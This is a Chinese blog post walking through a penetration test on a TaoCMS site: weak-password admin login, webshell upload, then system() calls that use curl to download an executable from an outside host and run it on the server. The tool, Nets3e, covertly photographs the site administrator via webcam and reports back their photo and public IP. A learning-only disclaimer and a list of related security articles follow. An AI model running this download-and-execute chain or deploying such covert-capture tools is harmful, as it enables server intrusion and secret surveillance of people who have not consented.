[ 渗透测试实战] 利用TaoCMS拿到网站Webshell后窃取管理员照片以及公网IP(Nets3e v1.1.1)

最新推荐文章于 2024-06-15 17:56:42 发布
置顶 最新推荐文章于 2024-06-15 17:56:42 发布
阅读量180 收藏
点赞数 1
分类专栏: 网络工具 文章标签: web安全
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/130907401
版权

Github==>https://github.com/MartinxMax/Nets3e

注意

该实验仅供学习,请不要以身试法!
一切未经授权的渗透行为,均属于违法行为!
不要有疑问,目前版本只支持windows,到后期会更新支持linux平台的

  • 鸣谢:
  • Freebuf==>https://www.freebuf.com/articles/web/366693.html
    漏洞环境搭建人员:
    Jpkie君桑
    CSDN博客
    GitHub
    BiliBli
    (被拍的匿名运维人员):
    留言:***

将模拟容易受攻击web程序,使用Nets3e v1.1.1模拟实验

弱口令进入后台

/admin/
QC}I~VO6BG928M4%I6CH8`J.png

VZU({30W9D2SCR$T3R3NG82.png

上传webshell

webshell路径:/martin.php

X9WJVF1]2F[Y8Q2D[XM]WVD.png

测试curl命令可运行
system('curl -help');
0UX5FN5PYT`6(O8WGRTY23V.png

利用CURL下载Nets3e客户端

system('curl -O http://xxxx.com/Nets3eClient_release.exe');

24EQ36`9FQQCY0NR4L1K0AK.png

在对方服务器运行Nets3e客户端

system('Nets3eClient_release.exe');

4(@I{2C12AD4YYKT2R3E8@J.png

返回敏感信息

{7R}UKCF(G{([}F.png

8YD29($1[0Z`L[IT5%JD2UV.png

Мартин.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
taocms 代码注入 (CVE-2022-25578)
qq_32445755的博客
06-12 1162
taoCMS是基于php+sqlite/mysql的国内最小(100Kb左右)的功能完善的CMS管理系统.体积小(仅180Kb)速度快,包含文件管理、数据采集、Memcache整合、用户管理等强大功能。 taocms v3.0.2 允许攻击者通过任意编辑.htaccess 文件来执行代码注入。 上传.htaccess文件编辑添加AddType application/x-httpd-php .jpghttp://123.58.236.76:32064/pictures/month_2206/2022061
taoCMS 2.5 Beta5
04-30
taoCMS是一个完善支持多数据库(Sqlite/Mysql)的CMS网站内容管理系统,是国内最小的功能完善的基于php+SQLite/Mysql的CMS。体积小(仅100Kb)速度快,包含文件管理、数据采集等强大功能,代码手写采用严格的数据过滤,保证服务器的安全稳定! taoCMS 2.5 Beta5 更新记录: 1、增加远程图片自动下载到本地服务器功能(感谢chengke) 2、支持安装在百度云服务BAE上 3、富文本编辑器xheditor升级到最新版(感谢xiaoniba) 4、增加缓存文件验证,防止直接访问缓存文件 5、安全加固,修复几个安全漏洞(感谢混世魔王和wooyun平台) 6、修复wap留言无法显示的BUG 7、调整跳转进度显示方式 8、改进安装提示 9、评论后台增加分页功能(感谢xiaoniba) 10、后台首页增加通知功能,便于发布紧急更新提示 11、后台首页增加捐赠连接,有你支持,我会更努力! 12、默认使用xheditor编辑器,不再单独提供精简版 13、在BAE/SAE等云服务器修改模板无需在本地生成缓存 14、修正sqlite的一个特殊字符写入失败错误(感谢Ethan) 15、修复安全问题,感谢shack2、kobin97、yy520 【使用方法】 上传程序到服务器,通过网址访问http://网站地址/intall.php,程序会自动提示权限问题,按照要求更改即可。 1、使用sqlite数据库: 请在数据库类型那里选sqlite,填写数据库文件所在地址和数据表前缀即可 2、使用mysql数据库 安装mysql数据库,请在数据库类型那里选mysql,数据库存放地址添写“|数据库地址|用户名|密码|数据库名”,例如“|localhost|root|root|taocms”,不包括双引号)。 安装完毕,建议删除install.php文件。 3、【登录后台(默认用户名admin密码tao),设定taocms所在的网址】 附带提供一套blog模板,参照www.taocms.org。 【2.4到2.5升级方法】 备份data目录、pictures目录、template目录,进入后台综合设置-导入导出,备份所有文章数据(目前评论无法导入2.5系统),安装2.5版,将备份文件导入2.5即可(请做好数据备份,如有异常,请到taoCMS官网论反映)。 【版权声明】 taoCMS为开源PHP系统,使用者需声明系统版权
[ 网络安全] Nets3e v1.1.1(偷拍受害者个人照片以及获取公网IP)
05-17 222
Nets3e v1.0.0基础上将代码进行了优化瘦身,并且提高稳定性,新增 debug内网最短路径攻击功能(通常用来测试主要功能是否存在异常)->局域网攻击的调试版本主要用于测试内部网络受害者数据是否能够到达本地机器。:生成PAYLOAD,如果你已经生成了payload将无需使用该参数。:进行流量转发的远程主机,协议是TCP不过这里要改成HTTP进行生成。->公网攻击的发布版本主要用于攻击公网用户。:设置本机监听IP(默认当前网卡IP):设置本机监听端口(默认10032)
[ 网络安全] Nets3e v1.1.2(偷拍照片,防止中间人嗅探流量分析)
06-08 137
废弃Base64编码传输,新增AES加密选项,将数据包混淆在正常的http请求中,并且进行加密传输,增大中间人截获数据后破解的难度。
taoCMS后台getshell漏洞复现
m0_52400001的博客
05-23 1050
简介 taoCMS是一个完善支持多数据库(Sqlite/Mysql)的CMS网站内容管理系统,是国内最小的功能完善的基于php+SQLite/Mysql的CMS 漏洞版本 taocms 3.0.2 开始复现 1.由于本地搭建的系统,我们直接输入amdn/taoj进入管理后台 2.进入管理后台以后我们去看左边的功能栏目,找到文件管理并点开,并发现.htaccess文件 3我们点击编辑这个文件,在文件的最后面添加'AddType application/x-httpd-php .php
实战渗透-一次拿到webshell后艰难的提权
qq_29437513的博客
07-25 2055
记上一篇,拿到webhshell后,数据库是dba, 本地上传一个cmd.exe组件上去后,执行失败 网上很多说改路径,写的也写不明白,想到之前迪哥用过的大马提权, 环境是php,但支持asp,有iis组件, 发现 D://recycle可写,传一个cmd.com组件执行命令 权限真的很小,是 nt service 网络用户权限,ns的权限是不能执行net的 支持的组件,提权的时候用的找 ===================== 查看systeminfo,发现有200多个补丁,准备打溢出,目标机是可以
鱼哥赠书活动第⑥期:《内网渗透实战攻略》看完这本书教你玩转内网渗透测试成为实战高手!!!!
Aluxian_的博客
01-10 5016
鱼哥赠书活动第⑥期:《内网渗透实战攻略》看完这本书教你玩转内网渗透测试成为实战高手!!
渗透测试攻防webshell大合集.zip
07-26
超千个实战webshell: 138shell antSword antSword-shells AntSwordProject asp aspx b4tm4n-toolz Backdoor Dev Shells webshellpub等等,太多了,不一一列举了,需要的下载使用。
渗透测试如何快速拿到Webshell1
08-03
1.1 文件上传: 1.2 文件删除: 1.3 文件修改: 1.4 读取/下载文件:
webshell渗透测试软件
08-10
网络安全与数据恢复相关工具,渗透测试软件
渗透测试的实施流程:明确目标、信息收集、漏洞发现、漏洞验证、后渗透测试
08-19
在这个阶段,渗透测试小组根据上一步发现的有可能成功利用的全部漏洞都验证一遍,结合实际情况,搭建模拟环境进行试验,成功后应用于目标系统中。漏洞验证方法包括自动化漏洞扫描工具结果验证、手工验证、根据公开...
WebShell 路人甲WEB管理 v1.3
11-10
路人甲WEB管理具有WebShell批量检测、批量执行命令、批量查询百度权重,百度收录,正确率可达百分之九十八,是一款不可多得的必备神器。路人甲WEB管理功能介绍:打开软件后将存有
春秋云境 CVE-2022-23880 taoCMS v3.0.2 任意文件上传漏洞
qq_38409397的博客
03-22 344
taoCMS v3.0.2 文件管理处存在任意文件上传漏洞,攻击者可执行任意代码
【网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【二】
q742971636的博客
06-12 722
以通过 Alt+F2 然后输入 xterm 尝试打开xterm。这之后就可以用Ctrl+Alt+T打开新终端了。在之前的代码中,已经捕获到攻击流量并打印。
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 701
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
车载网络安全指南 概述(一)
qq_42357877的博客
06-12 291
汽车电子系统网络安全指南给出汽车电子系统网络安全活动框架,以及在此框架下的汽车电子系统网络安全活动、组织管理和支持保障等方面的建议。汽车电子系统网络安全指南适用于指导整车厂、零部件供应商、软件供应商、芯片供应商以及各种服务提供商等汽车电子供应链上各组织机构开展网络安全活动,指导相关人员在从事汽车电子系统的设计开发、生产、运行和服务等过程中满足基本的网络安全需求。
【网络安全】网络安全基础精讲 - 网络安全入门第一篇
goldfish8848的博客
06-11 1289
网络安全基础知识
网络安全攻防基础入门笔记--操作系统&名词解释&文件下载&反弹shell&防火墙绕过
最新发布
谜语人的博客
06-15 837
全程Proof of Concept,中文"概念验证",常指一段漏洞证明的代码。
拿到webshell
07-27
拿到webshell是指成功获取到一个可用于远程控制web服务器的恶意脚本或程序。作为攻击者,要进行webshell渗透,主要需要考虑如何绕过系统上传webshell的限制,以及如何隐藏webshell以免被查杀。一般情况下,攻击者会...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值